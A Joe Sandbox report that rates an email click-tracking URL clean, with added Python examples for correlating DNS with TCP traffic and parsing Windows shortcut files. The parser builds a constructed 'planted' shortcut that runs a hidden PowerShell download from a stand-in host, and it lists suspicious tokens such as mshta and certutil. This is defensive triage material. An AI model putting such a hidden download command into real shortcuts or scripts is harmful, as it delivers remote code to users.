Windows Analysis Report
http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0

Overview

General Information

Sample URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
Analysis ID:1540484

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Stores files to the Windows start menu directory

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Signature results (no malicious signatures matched):

Source: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 | HTTP Parser: No favicon
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 (reported 6 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 (reported 6 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27 (reported 18 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 (reported 6 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200 (reported 14 times)
Source: global traffic | HTTP traffic detected:
  GET /fs/windows/config.json HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
  Range: bytes=0-2147483646
  User-Agent: Microsoft BITS/7.8
  Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 HTTP/1.1
  Host: click.email.traininng.com
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: click.email.traininng.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Referer: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: click.email.traininng.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Date: Wed, 23 Oct 2024 18:24:36 GMT
  Connection: close
  Content-Length: 1245
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 6
  Data Ascii (decoded from the raw bytes above; the capture is truncated where the hex ends, and the text is the stock IIS "404 - File or directory not found." error page):
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
    <title>404 - File or directory not found.</title>
    <style type="text/css">
    <!--
    body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
    fieldset{padding:0 15px 10px 15px;}
    h1{font-size:2.4em;margin:0;color:#FFF;}
    h2{font-size:1.7em;margin:0;color:#CC0000;}
    h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
    #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
    background-color:#555555;}
    #content{margin:0 0 0 2%;position:relative;}
    .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
    -->
    </style>
    </head>
    <body>
    <div id="header"><h1>Server Error</…
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
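The "TCP traffic detected without corresponding DNS query" hits above come from joining the capture's DNS answers against its TCP connections: a destination that no answer resolved to before the connection was opened is flagged. The Python below is an added example of that correlation, not Joe Sandbox code, run over constructed records built from the IPs in this report (the timestamps and the per-flow details are made up). It also applies the report's own "Excluded IPs from analysis (whitelisted)" list, because when a sandbox drops whitelisted domains from analysis the lookups for those names disappear from the capture too, and a connection can then look DNS-less simply because its lookup was whitelisted; the five flagged IPs are not on that list, so they stay flagged. One more pattern worth knowing when reading the domain table further down: click.virt.s11.exacttarget.com appears with an address while the sample's own host click.email.traininng.com has none, which is how a CNAME chain usually shows up in such tables (an inference, not something the report states).

```python
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample data modelled on this report: DNS answers the sandbox
# captured and TCP connections the guest opened. Times are made up.
DNS_ANSWERS = [
    # (time, queried name, answer IP)
    (10.0, "www.google.com", "142.250.186.36"),
    (12.0, "click.virt.s11.exacttarget.com", "13.111.71.11"),
]

TCP_CONNECTIONS = [
    # (time, destination IP, destination port)
    (9.0, "142.250.186.36", 443),    # opened before the answer arrived: still unresolved at that time
    (11.0, "142.250.186.36", 443),
    (13.0, "13.111.71.11", 80),
    (14.0, "184.28.90.27", 443),
    (14.5, "184.28.90.27", 443),
    (15.0, "204.79.197.203", 443),
    (16.0, "172.202.163.200", 443),
    (17.0, "192.229.211.108", 80),
    (18.0, "20.189.173.10", 443),
    (19.0, "239.255.255.250", 1900),  # SSDP multicast: never resolved, never interesting
]

# IPs the report lists as excluded from analysis (whitelisted). Traffic to them is
# dropped by the sandbox, so their DNS lookups may be missing from the capture as well.
EXCLUDED_IPS = frozenset({"172.217.16.195", "64.233.167.84", "142.250.185.206",
                          "34.104.35.123", "172.217.16.131", "142.250.185.110"})


def connections_without_dns(dns_answers, tcp_connections, excluded_ips=frozenset()):
    """Return {ip: hit count} for TCP destinations that no DNS answer had resolved
    to by the time the connection was made. Multicast, private and excluded
    addresses are skipped so the output is only routable, unexplained peers."""
    first_seen = {}                      # earliest time each IP appeared in an answer
    for t, _name, ip in dns_answers:
        first_seen[ip] = min(t, first_seen.get(ip, t))
    hits = defaultdict(int)
    for t, ip, _port in tcp_connections:
        addr = ip_address(ip)
        if addr.is_multicast or addr.is_private or ip in excluded_ips:
            continue
        if ip not in first_seen or first_seen[ip] > t:
            hits[ip] += 1
    return dict(hits)


def resolved_names(dns_answers):
    """Map each answered IP back to the names that resolved to it, for triage output."""
    names = defaultdict(set)
    for _t, name, ip in dns_answers:
        names[ip].add(name)
    return {ip: sorted(n) for ip, n in names.items()}


if __name__ == "__main__":
    flagged = connections_without_dns(DNS_ANSWERS, TCP_CONNECTIONS, EXCLUDED_IPS)
    for ip, n in sorted(flagged.items()):
        print("TCP traffic detected without corresponding DNS query: %s (reported %d times)" % (ip, n))
```

The ordering check matters in practice: a connection opened before the answer arrived is reported even though the address is later resolved, which is exactly what an early, hard-coded contact followed by a "cover" lookup looks like. When reviewing a sandbox report, compare the flagged addresses against the report's excluded-IP list before reading a hit as hard-coded addressing.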
Source: classification engine | Classification label: clean0.win@17/10@6/5
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (reported 13 times)
Source: Google Drive.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.1.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
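The six .lnk files written under Start Menu\Programs\Chrome Apps are what trips the "Stores files to the Windows start menu directory" signature, and the report attributes their creation to chrome.exe itself, with each shortcut's relative path ending in chrome_proxy.exe. Confirming that a Start Menu shortcut really points where it claims is a parse of the shell link, not a string search, since the relative path, the LinkInfo local base path and the command-line arguments are separate fields and an attacker-planted shortcut can make any one of them look innocent. The Python below is an added example, not code from Joe Sandbox or from the report, that reads the ShellLinkHeader, the LinkInfo local base path and the string data as MS-SHLLINK defines them, flags the things a triage would look at, and includes a small builder so the parser can be exercised offline. The shortcut bytes it builds are constructed, not the report's dropped files; the command-line arguments in the benign sample are assumed (the report does not reproduce them), and the planted sample with its example.invalid URL is invented for contrast.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))
SUSPICIOUS_ARG_TOKENS = ("powershell", "cmd.exe", "cmd /", "mshta", "wscript", "cscript",
                         "rundll32", "regsvr32", "certutil", "http://", "https://")


def parse_lnk(data):
    """Parse the ShellLinkHeader, LinkInfo local base path and StringData of a .lnk blob."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, attrs = struct.unpack_from("<II", data, 20)
    info = {"flags": flags, "file_attributes": attrs,
            "show_command": struct.unpack_from("<I", data, 60)[0], "local_base_path": None}
    pos = 0x4C
    if flags & HAS_IDLIST:                       # skip the IDList: 2-byte size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        li_size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            end = data.index(b"\x00", pos + lbp_off)
            info["local_base_path"] = data[pos + lbp_off:end].decode("latin-1")
        pos += li_size
    for key, bit in STRING_FIELDS:               # CountCharacters-prefixed, no terminator
        if not flags & bit:
            info[key] = None
            continue
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * n].decode("utf-16-le")
            pos += 2 * n
        else:
            info[key] = data[pos:pos + n].decode("latin-1")
            pos += n
    return info


def lnk_findings(info, expected_target):
    """Triage: target other than the expected binary, script/download tokens in the
    arguments, or a window that opens minimized (SW_SHOWMINNOACTIVE = 7)."""
    findings = []
    if (info["local_base_path"] or "").lower() != expected_target.lower():
        findings.append("target is %r, expected %r" % (info["local_base_path"], expected_target))
    args = (info["arguments"] or "").lower()
    findings.extend("arguments contain %r" % tok for tok in SUSPICIOUS_ARG_TOKENS if tok in args)
    if info["show_command"] == 7:
        findings.append("shortcut opens its window minimized")
    return findings


def build_lnk(local_base_path, relative_path, working_dir, arguments="", show_command=1):
    """Write a minimal, spec-shaped .lnk: header, LinkInfo with a local base path, string data.
    Constructed test input only; it is not one of the report's dropped files."""
    flags = HAS_LINKINFO | HAS_RELPATH | HAS_WORKDIR | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    path = local_base_path.encode("latin-1") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    vol_off = 0x1C                                                  # LinkInfo header: 7 DWORDs
    lbp_off = vol_off + len(volume_id)
    suffix_off = lbp_off + len(path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, vol_off, lbp_off, 0, suffix_off)
    link_info += volume_id + path + b"\x00"                         # empty CommonPathSuffix

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + link_info + s(relative_path) + s(working_dir) + (s(arguments) if arguments else b"")


CHROME_PROXY = r"C:\Program Files\Google\Chrome\Application\chrome_proxy.exe"
CHROME_APP_DIR = r"C:\Program Files\Google\Chrome\Application"

# Constructed samples: one shaped like the report's Chrome Apps shortcuts (arguments assumed),
# one shaped like a shortcut an attacker would plant in the same Start Menu folder.
BENIGN_LNK = build_lnk(CHROME_PROXY,
                       r"..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe",
                       CHROME_APP_DIR, "--profile-directory=Default --app-id=example")
PLANTED_LNK = build_lnk(r"C:\Windows\System32\cmd.exe", r"..\..\..\..\Windows\System32\cmd.exe",
                        r"C:\Users\user", '/c powershell -w hidden -c "iwr http://example.invalid/x"',
                        show_command=7)

if __name__ == "__main__":
    for label, blob in (("chrome app", BENIGN_LNK), ("planted", PLANTED_LNK)):
        info = parse_lnk(blob)
        print(label, info["local_base_path"], lnk_findings(info, CHROME_PROXY))
```

The parser deliberately reports the LinkInfo local base path separately from the relative path: Explorer resolves the shortcut through the former, so a shortcut whose relative path reads chrome_proxy.exe but whose base path is something else is the case worth catching. Real dropped files also carry an IDList and often extra data blocks after the string data; the parser skips the IDList by its size field and ignores trailing blocks, so it works on those too.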
MITRE ATT&CK matrix (a leading number is the count of matched signatures for that technique; entries without a number are the matrix's unmatched placeholder cells):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: 1 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
Defense Evasion: 1 Masquerading; 1 Process Injection; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: 1 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; 3 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
click.virt.s11.exacttarget.com | 13.111.71.11 | true | false | - | unknown
www.google.com | 142.250.186.36 | true | false | - | unknown
click.email.traininng.com | unknown | unknown | false | - | unknown

URLs (Name | Malicious | Antivirus Detection | Reputation):
http://click.email.traininng.com/favicon.ico | false | - | unknown
http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 | false | - | unknown
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
142.250.186.36 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
216.58.212.132 | unknown | United States | 15169 | GOOGLEUS | false
13.111.71.11 | click.virt.s11.exacttarget.com | United States | 22606 | EXACT-7US | false

IP (private range): 192.168.2.16
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1540484
            Start date and time:2024-10-23 20:24:01 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsinteractivecookbook.jbs
            Sample URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:CLEAN
            Classification:clean0.win@17/10@6/5
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 172.217.16.195, 64.233.167.84, 142.250.185.206, 34.104.35.123, 172.217.16.131, 142.250.185.110
            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
            • VT rate limit hit for: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            No simulations
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2673
            Entropy (8bit):3.9779892093983644
            Encrypted:false
            SSDEEP:48:8HKdesTTHAHy/OidAKZdA1FehwiZUklqehKlxy+3:8HRsferxy
            MD5:19CF9117D0063BDEC36BBC5B2C99888C
            SHA1:30BA6E657AD224664B7D017EA5E737AAB2FD72A0
            SHA-256:0D9618938EBE82B88DA64DDDCED7C4A01039A40E1F652E6FF3B4AB2A2BE791F9
            SHA-512:26E6562AE62A9C89A412182751B19D519F3F84D90C6641EFE68F885E1A0F29258B5A659C54F8BDA334728850D32BAA2FEB9E2DA18CCD6762380083C5DAC62C8F
            Malicious:false
            Reputation:low
